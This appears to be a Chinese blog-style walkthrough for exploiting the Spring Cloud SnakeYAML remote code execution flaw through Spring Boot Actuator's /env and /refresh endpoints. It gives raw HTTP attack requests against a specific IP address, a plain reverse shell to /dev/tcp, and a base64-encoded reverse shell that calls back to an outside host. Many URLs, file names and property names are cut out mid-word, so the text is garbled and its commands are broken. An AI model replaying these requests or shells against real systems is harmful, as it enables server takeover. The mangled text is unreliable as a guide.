2023年6月27日发(作者：)

Spring-boot远程代码执⾏系列（springcloudSnakeYAMLRCE）0x01 漏洞原理1. on 属性被设置为外部恶意 yml ⽂件 URL 地址2. refresh 触发⽬标机器请求远程 HTTP 服务器上的 yml ⽂件，获得其内容3. SnakeYAML 由于存在反序列化漏洞，所以解析恶意 yml 内容时会完成指定的动作4. 先是触发 去拉取远程 HTTP 服务器上的恶意 jar ⽂件5. 然后是寻找 jar ⽂件中实现 EngineFactory 接⼝的类并实例化6. 实例化类时执⾏恶意代码，造成 RCE 漏洞0x02 利⽤条件可以 POST 请求⽬标⽹站的

/env 接⼝设置属性可以 POST 请求⽬标⽹站的

/refresh 接⼝刷新配置（存在

spring-boot-starter-actuator 依赖）⽬标依赖的

spring-cloud-starter 版本 < E⽬标可以请求攻击者的 HTTP 服务器（请求可出外⽹）0x03 漏洞复现1、拉取漏洞环境（），运⾏环境，推荐在docker下运⾏。//拉取git clone /LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce//运⾏mvn installmvn spring-boot:rungit clone /artsploit/ac src/artsploit/r -cvf -C src/ .4、新建⽂件，编辑图中内容。将⽂件和⽂件拷贝到相同⽬录下。并使⽤python开启80端⼝的web服务。5、设置on 属性spring /env HTTP/1.1Host: 140.143.30.49:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: on=you-vps-ip/刷新配置。POST /refresh HTTP/1.1Host: 140.143.30.49:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 05、命令成功执⾏。6、反弹shellbash -i >& /dev/tcp/ip/53 0>&1命令转换⽹站（/?post=293）bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzUuMjEyLjExOC81MyAwPiYx}|{base64,-d}|{bash,-i}0x04 参考